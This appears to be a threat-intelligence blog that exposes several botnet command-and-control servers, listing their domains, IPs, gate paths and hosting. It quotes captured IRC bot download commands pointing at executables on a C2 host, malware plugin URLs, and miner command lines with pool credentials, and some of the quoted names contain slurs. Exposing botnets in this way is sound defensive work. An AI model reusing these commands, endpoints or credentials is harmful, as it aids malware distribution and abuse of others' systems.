Author: I_Post_Ur_Info

imgay.ddos.es (betabot http botnet hosted by Fastflux)

Uncategorized

Server:  imgay.ddos.es Gate file:  /h/order.php Alternate domains: imgay.ddos.cat imgay.theswat.net ddos.cat has been linked to botnets before Hosting infos: ;; QUESTION SECTION: ;imgay.ddos.es. IN A ;; ANSWER SECTION: imgay.ddos.es. 149 IN A 94.27.87.58 imgay.ddos.es. 149 IN A 98.195.89.225 imgay.ddos.es. 149 IN A 174.112.126.155 imgay.ddos.es. 149 IN A 176.40.77.176 imgay.ddos.es. 149 IN A 178.150.207.252 imgay.ddos.es. 149 INRead more...

wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)

Uncategorized

Resolved wrightfeldhusen.info to 69.197.35.109 Server:  wrightfeldhusen.info Gate file:  /beta/order.php Alternate domains: akwebdesigner.info websachee.info tincorporated.info thetwenty.info swedishseasons.info lommebags.info andywilsonfs.info ghostgames1.info futureofwebdesign.info vdezignstudio.info waterworks2.info waterworks2.com nordkupp1.info circusbum.info novflex.info  This is hosted on the same server as this andromeda bot. Hosting infos: http://whois.domaintools.com/69.197.35.109

www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)

Uncategorized

Resolved www.panel-gc.co.uk to 69.197.35.109 Server:  www.panel-gc.co.uk Gate file:  /panel/gate.php Plugins:  hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod This is andromeda 2.7, not the older cracked version. Bitcoin mining info: -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo Hosting infos: http://whois.domaintools.com/69.197.35.109

srv5.su (snk asper mod irc botnet hosted by softronics.ch)

Uncategorized

Resolved srv5.su to 94.242.198.64 Server:  srv5.su Port:  5050 Channel:  #ok #ok :.j #spr .j #lock .j #spam #ok :.d p /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/114/105/119/81/50/105/98/117/ Downloads hxxp://94.242.198.64/4/smart.exe Channel:  #spr #spr :.d x /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/111/122/100/11/121/116/127/ Downloads hxxp://94.242.198.64/4/spra.exe Channel:  #lock #lock :.d l /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/96/112/107/110/11/121/116/127/ Downloads hxxp://94.242.198.64/4/lock.exe (winlocker) Channel:  #spam #spam :.s.a /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/111/119/109/102/78/50/105/98/117/ /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/57/48/ 49 meeisodf Alternate domain:  srv50.su Hosting infos: http://whois.domaintools.com/94.242.198.64

guard4you.info (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved guard4you.info to 80.82.66.26 Server:  guard4you.info Gate file:  /customer/order.php Alternate domains:  nexusguardian.info vote4us.info meet2n8.info This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably allRead more...

208.89.209.54 (Irc botnet hosted by virpus.com)

Uncategorized

Server:  208.89.209.54 Port:  6667 Current global users 77, max 695 Channels: #goon            3        #aryan           39       #OFFLINE#flood           1        ##yBz##          15       ##Offline##      19    Aryan bots: Channel:  #aryan Topic for #aryan is: #OFFLINE Topic for #aryan set by formality at Sun May 05 16:23:03 2013 Linux bots: Channel:  ##Offline## Channel:  ##yBz## Hosting infos:  http://whois.domaintools.com/208.89.209.54

betabros.in (Several http botnets hosted by hostkey.ru)

Uncategorized

Resolved betabros.in to 146.0.78.4 Server:  betabros.in Gate file:  /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/146.0.78.4 EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...

jkdef8.ws (Betabot http botnet hosted by ecatel.net)

Uncategorized

Resolved jkdef8.ws to 94.102.51.117 Server:  jkdef8.ws Gate file:  /papka/order.php Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws Bitcoin mining info:  http://pooledbits.com:8337 -u nigfinity.1 -p x Hosting infos: http://whois.domaintools.com/94.102.51.117